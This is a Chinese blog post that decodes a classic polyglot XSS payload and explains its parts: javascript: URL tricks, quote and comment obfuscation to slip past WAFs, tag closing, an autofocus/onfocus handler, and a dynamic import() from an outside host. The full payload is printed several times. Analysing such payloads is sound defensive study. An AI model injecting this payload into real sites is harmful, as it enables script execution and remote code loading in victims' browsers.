【XSS payload 】一个经典的XSS payload

zhengfei6112026-02-25 20:06

整体结构

原始Payload:

复制代码 
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

解码关键部分:

  • %250A → 换行符 \n

  • %26apos;'(HTML实体单引号)

  • \74 → 八进制 <

  • \76 → 八进制 >

解码后大致为:

复制代码 
JavaScript://\n/*?'/*\'/*"/*\"/*`/*\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript><k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//>
-->
复制代码

注意末尾的 //>--> 是分离的。

各组成部分的作用

1. JavaScript伪协议 + 换行绕过注释

  • JavaScript:// 试图构造一个 javascript: URL(大小写不敏感),但多了一个斜杠,实际浏览器可能仍解析为伪协议。

  • %250A 解码为换行符,用于结束单行注释 //,使得后续代码变为可执行。

  • javascript: URL 中,浏览器先对URL解码,然后执行得到的JavaScript代码。解码后为 JavaScript://\n...,其中 // 注释掉空内容,换行后代码开始执行。

2. 多种引号和注释混淆
  • /*?'/*\'/*"/*\"/*/*`/*')/*<!--这部分包含各种引号(单、双、反引号)及转义版本,以及HTML实体,旨在绕过WAF对特定字符的过滤。同时夹杂/*<!--` 注释,可能试图干扰解析器。
3. 闭合常见HTML标签
  • </Title></Style></Script></textArea></iFrame></noScript> 试图关闭可能存在的父标签,使后续内容作为新的HTML插入,从而注入新元素。
4. 注入新标签及事件处理器

  • \74k<K 解码为 <k<K,可能是 <k<K 标签(不标准,但浏览器会尝试解析为标签名)。随后紧跟 /contentEditable/autoFocus/OnFocus=,这试图为标签设置属性:

    • contentEditable 使元素可编辑

    • autoFocus 使页面加载时自动获得焦点

    • OnFocus 定义焦点事件的处理函数

  • 属性值是一段JavaScript代码,其中包含多层注释和 import() 调用。

5. 事件处理函数中的JavaScript

OnFocus 的值:

复制代码 
/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

  • 经过注释解析后,实际执行的代码为:{ /**/ (import(/https: X55.is/.source)) }(前面的 /*...*/ 注释掉了 /*${/*/;,后面的 //> 注释掉剩余部分)。

  • import(/https: X55.is/.source)

    • /https: X55.is/ 是一个正则表达式字面量,.source 返回其字符串内容 "https: X55.is"

    • 因此 import() 试图动态加载模块 "https: X55.is",但该URL包含空格,实际无效。可能本意是加载 https://X55.is/,但写法有误。

  • 如果加载成功,该外部脚本可能包含 alert() 或其他恶意代码。

6. HTML注释闭合
  • 最后的 \76--> 解码为 >-->,可能试图闭合前面可能存在的 <!-- 注释,确保HTML结构完整。

攻击原理总结

该Payload尝试在多种上下文中执行:

  • 作为 javascript: URL :若放在 hrefsrc 中,点击或加载时会执行解码后的代码,触发动态导入。

  • 作为HTML注入 :若插入到页面中,它会闭合已有标签,创建新元素(如 <k>)并设置 onfocus 事件,当元素获得焦点(如通过 autofocus)时执行事件中的 import()

  • 动态导入:尝试加载外部脚本,若成功则可能弹出弹窗。

由于语法错误(import 参数格式不对),该Payload可能无法直接执行,但反映了攻击者常用的混淆技术,包括:

  • URL编码绕过

  • 注释嵌套和换行

  • 多种引号组合

  • 标签闭合和事件注入

  • ES6动态导入

注意 :实际测试时,import() 需要正确的模块URL,且受CORS限制,因此该Payload可能仅用于演示或绕过WAF的测试。

相关推荐
前端精髓19 小时前
移除 Effect 依赖
前端·javascript·react.js
码云之上19 小时前
从一个截图函数到一个 npm 包——pdf-snapshot 的诞生记
前端·node.js·github
码事漫谈20 小时前
AI提效,到底能强到什么程度?
前端·后端
IT_陈寒20 小时前
React hooks依赖数组这个坑差点把我埋了
前端·人工智能·后端
阿祖zu20 小时前
内容创作 AI 透明化声明倡议与项目开源
前端·后端·github
lpfasd12321 小时前
TypeScript + Cloudflare 全家桶部署项目全流程
前端·javascript·typescript
ZC跨境爬虫21 小时前
极验滑动验证码自动化实战:背景提取、缺口定位与Playwright滑动模拟
前端·爬虫·python·自动化
前端Hardy21 小时前
字节/腾讯内部流出!Claude Code 2026王炸玩法!效率暴涨10倍
前端·javascript·vue.js
糟糕好吃21 小时前
AI 全流程解析(LLM / Token / Context / RAG / Prompt / Tool / Skill / Agent)
前端·后端·设计模式
快手技术21 小时前
快手广告系统全面迈入生成式推荐时代!GR4AD:从Token到Revenue的全链路重构
前端·后端
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南04Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06Claude Code 未登录 使用第三方模型07Oh My Codex 快速使用指南08UV安装并设置国内源09【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线10最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化